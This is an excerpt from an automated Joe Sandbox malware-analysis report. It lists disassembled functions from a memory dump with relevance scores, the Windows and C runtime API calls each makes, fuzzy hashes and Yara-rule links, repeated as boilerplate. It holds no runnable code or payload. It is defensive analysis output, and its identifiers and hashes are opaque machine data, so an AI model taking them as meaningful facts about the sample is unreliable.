Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 78a1784bb16ff2f03b7d5e05e068336b30968355258f6cd97fcc5500695864e1
Instruction ID: e9efde38fe1ee5bc5eec5f52d853bacd0b70845eb338f278763cb3eba52b0457
Opcode Fuzzy Hash: 78a1784bb16ff2f03b7d5e05e068336b30968355258f6cd97fcc5500695864e1
Instruction Fuzzy Hash: 87F0E935B0060CA7C724FB50E852CFEB3B89F917207248029EB5963983DF71EE05D692

Function 0010C990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0010CA17

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6ce9b122a8b3e71e1b9d85e24c4c8e5c2461f141074a280fd85b1d8695520d9e
Instruction ID: aeae3c3b8d01c9ab893d631999df69ab16b85700feba8a3e632fccc2a3229293
Opcode Fuzzy Hash: 6ce9b122a8b3e71e1b9d85e24c4c8e5c2461f141074a280fd85b1d8695520d9e
Instruction Fuzzy Hash: F7B12932A002459FDB15CF28C8927FEBBE5EF55350F158269E485EB281D7B49D41CF90

Function 00104F5E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00105025
___AdjustPointer.LIBCMT ref: 00105048
___AdjustPointer.LIBCMT ref: 001050E4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d9a9da67cb077afb2a1e7ef9332c75bc592fbac4047fff2acea33ec0e3b9f816
Instruction ID: 5f7aaa21bda57b7fdad23cd93d74d3e2c1575cd6f8af51e2e0159ca4088913b5
Opcode Fuzzy Hash: d9a9da67cb077afb2a1e7ef9332c75bc592fbac4047fff2acea33ec0e3b9f816
Instruction Fuzzy Hash: A251E272A01A06AFEB298F14D891BBF77A6FF64310F144129F986572D9D7B1EC40CB90

Function 000D8290 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,E20BEACA), ref: 000D8309
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D8370
GetProcAddress.KERNEL32(00000000), ref: 000D8377

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: fb8068375f30555791fb2488104bd54d7a9a9a27aceccec1c78897bf95abeb50
Instruction ID: a208191854f8b129467a0cd413cb0b4796e625ce3f8a599105c75dd90543da5b
Opcode Fuzzy Hash: fb8068375f30555791fb2488104bd54d7a9a9a27aceccec1c78897bf95abeb50
Instruction Fuzzy Hash: DE51F7719003489BEB24EB68DD497DDB774EB45710F50829AE818A73C2EB345AC08BA1

Function 00104B25 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00104B76
TypeidsEqual.LIBVCRUNTIME ref: 00104B9B
PMDtoOffset.LIBCMT ref: 00104BB1
PMDtoOffset.LIBCMT ref: 00104C32

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: ab8582ee16ea2ff781037ca166b91c10ddab46c28bf0443b915798393ac11f80
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: FE51BDB5D052099FEF14CF68C6C06AEBBF5EF65320F14448EDA80A7291D7B2AD05CB90

Function 000D2DC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 000D2E5F
GetCurrentThreadId.KERNEL32 ref: 000D2E7E
__Mtx_unlock.LIBCPMT ref: 000D2ECC
__Cnd_broadcast.LIBCPMT ref: 000D2EE3

Part of subcall function 000EC5AF: mtx_do_lock.LIBCPMT ref: 000EC5B7

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: 062cbd066ab21e64ceb1188e131b30ab69889cc04e04319ea65c9356fb8ceb1f
Instruction ID: 7fe7d9c9c05893575d8a599b2970657049cc2c7bb96342f699e21377b51aeae5
Opcode Fuzzy Hash: 062cbd066ab21e64ceb1188e131b30ab69889cc04e04319ea65c9356fb8ceb1f
Instruction Fuzzy Hash: 6941DDB1A007059FEB21EB65C940B9BB7E8FF25320F00467AE815E7742EB31E901CB91

Function 00115E6E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00115F3E
_free.LIBCMT ref: 00115F67
SetEndOfFile.KERNEL32(00000000,001118AA,00000000,0010AB32,?,?,?,?,?,?,?,001118AA,0010AB32,00000000), ref: 00115F99
GetLastError.KERNEL32(?,?,?,?,?,?,?,001118AA,0010AB32,00000000,?,?,?,?,00000000), ref: 00115FB5

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: a5114e4289bd5397706e7d5c29c5187af67a57ad603f80833843c9e59ba859b4
Instruction ID: 0523566c97d4ca607e490ad60220a8371f420b1e3d7dc5595615f44f1c308065
Opcode Fuzzy Hash: a5114e4289bd5397706e7d5c29c5187af67a57ad603f80833843c9e59ba859b4
Instruction Fuzzy Hash: 4641D432904A02EBDB19ABB89C46BDE7B77AF94320F250530F424E72D2E774D9D24761

Function 000F2C0C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 000F2C1F

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 49978dfbb6a56a3a13b4b81747f0204f186da04fc69029c6e939991655fe0a97
Instruction ID: e7bc50c5e89a2984ae8bd0c09daf44141771aad6a309fc67b1f9b87eee7a7de1
Opcode Fuzzy Hash: 49978dfbb6a56a3a13b4b81747f0204f186da04fc69029c6e939991655fe0a97
Instruction Fuzzy Hash: 7C314875A00309DFCF10DF94C9C0BBEBBB9AF44310F1404AAEE55AB646D771A944EBA0

Function 0010D7EF Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 001068DC: _free.LIBCMT ref: 001068EA

Part of subcall function 0010E7C6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00114C60,?,00000000,00000000), ref: 0010E868

GetLastError.KERNEL32 ref: 0010D857
__dosmaperr.LIBCMT ref: 0010D85E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0010D89D
__dosmaperr.LIBCMT ref: 0010D8A4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: af30f6c4fca455fe006f7698f1775ddcef7fd68c7068b3ecdb7b94524d646904
Instruction ID: 5d7dc9b984f82ff83cf08d59cd400671c16f98ddc9facd00d49e68bcf0039ce6
Opcode Fuzzy Hash: af30f6c4fca455fe006f7698f1775ddcef7fd68c7068b3ecdb7b94524d646904
Instruction Fuzzy Hash: 0321F871A04205AFEB246FE5BC8096B77ADEF14374310C52AF9A9871D0D7F0EC508BA0

Function 001009A8 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 001009F9
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001009E1

Part of subcall function 000F8E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 000F8E60

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00100A5C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0012F490), ref: 00100A61

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 5285007e8c33e1e2920efa62a6b0c219977b35b7219686561025519533edd8c6
Instruction ID: 0200ee9e5b071971000db8523d96e32f601f14b8b247bccae5a2ac312a5119a2
Opcode Fuzzy Hash: 5285007e8c33e1e2920efa62a6b0c219977b35b7219686561025519533edd8c6
Instruction Fuzzy Hash: 56212671700218AFC710E758DC45DBEB7BCEF48760F10412AFA56A36D2DBB0AD028BA1

Function 000F9BA5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 000F9BAC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 000F9BF8
std::bad_exception::bad_exception.LIBCMT ref: 000F9C0E
std::bad_exception::bad_exception.LIBCMT ref: 000F9C7A

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: c24ed6d59e5b4866925cb0b7c330c242589e75aa128be941c7a918cae975439c
Instruction ID: 15e620ff85b0ecc04c143c47fb56c7552854b70e85e4bdffb2aef6b0fc4251a0
Opcode Fuzzy Hash: c24ed6d59e5b4866925cb0b7c330c242589e75aa128be941c7a918cae975439c
Instruction Fuzzy Hash: 2421A17190021C9FDB05EFA4D982EFDB7F4EF14310B10402AF205AB652EB716E41DB95

Function 0010A511 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0010685A,?,?,?,?,0010748E,?), ref: 0010A516
_free.LIBCMT ref: 0010A573
_free.LIBCMT ref: 0010A5A9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010685A,?,?,?,?,0010748E,?), ref: 0010A5B4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 9b8dac82c9e22bce2d59e655f088c5e95664941b1ae3d43f88f4edeac696310f
Instruction ID: c1bc31c03ef3c152593aaa340d7cf4882a2218e9232a29a61c15d6641a363b2e
Opcode Fuzzy Hash: 9b8dac82c9e22bce2d59e655f088c5e95664941b1ae3d43f88f4edeac696310f
Instruction Fuzzy Hash: 601148327087056FD61237B86C86E3F211ABFE13B1BA50324F2A49A1E1EFF1CC024212

Function 0010A668 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00107428,000D2147), ref: 0010A66D
_free.LIBCMT ref: 0010A6CA
_free.LIBCMT ref: 0010A700
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00107428,000D2147), ref: 0010A70B

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6d3230e57aeb6b187ff118011796a9c7d04291588527e37756d70316b0ef9ed7
Instruction ID: 58e1f50df734615bcf2996b5fcc3de39d832639ba31faa6b3fbd4bab970aef9d
Opcode Fuzzy Hash: 6d3230e57aeb6b187ff118011796a9c7d04291588527e37756d70316b0ef9ed7
Instruction Fuzzy Hash: 6C112B326047046BD71237B95DC6E6F216EAFD17F1BE90224F2A8961E1DFF2CC424116

Function 000EF1FD Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 000EF21F

Part of subcall function 000EF3DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 000F5396

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 000EF240

Part of subcall function 000F00C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 000F00DE

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 000EF25C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 000EF263

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 50b53d685c9e4929ab8099023a99fedce2392c6e11f1e824b9e86777f6115981
Instruction ID: 77bb96458cba8c9f68ae0d2cc02ad019cf58b9418b65bb4f54ea08417b33e397
Opcode Fuzzy Hash: 50b53d685c9e4929ab8099023a99fedce2392c6e11f1e824b9e86777f6115981
Instruction Fuzzy Hash: A60188B550034AAFD7207F668C818BBBBACDF15350B10853EF655F6183D770990487A1

Function 001032CE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001032E8
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 001032FC
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00103314
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0010332C

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: e9cae81b2dd54778684b4b862b7c58802bedc9c53e68f15f6ac49bb3fd8c4305
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: C101A232600614B7CB16BA55C892AEF77AEAF65350F000055FD61AF2C2DBB1EE1096A0

Function 0010B5EC Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0010B751,00000000,?,00111E4B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0010B602
GetLastError.KERNEL32(?,00111E4B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0010B751,00000000,00000104,?), ref: 0010B60C
__dosmaperr.LIBCMT ref: 0010B613

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: bda98881c8b0063a51efb7ffceeae4c239fc5f397da5dd6d66de39f59b270a1b
Instruction ID: ba1773f056010e60a36ae9d5885ebcc3ee72014e36fb2e0f6f3e702b667da0e4
Opcode Fuzzy Hash: bda98881c8b0063a51efb7ffceeae4c239fc5f397da5dd6d66de39f59b270a1b
Instruction Fuzzy Hash: B9F08132608515BBDB215FA2DC48D5ABF6AFF543A03014510F95CC64A0CBB2E871DBD0

Function 0010B655 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0010B751,00000000,?,00111DD6,00000000,00000000,0010B751,?,?,00000000,00000000,00000001), ref: 0010B66B
GetLastError.KERNEL32(?,00111DD6,00000000,00000000,0010B751,?,?,00000000,00000000,00000001,00000000,00000000,?,0010B751,00000000,00000104), ref: 0010B675
__dosmaperr.LIBCMT ref: 0010B67C

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
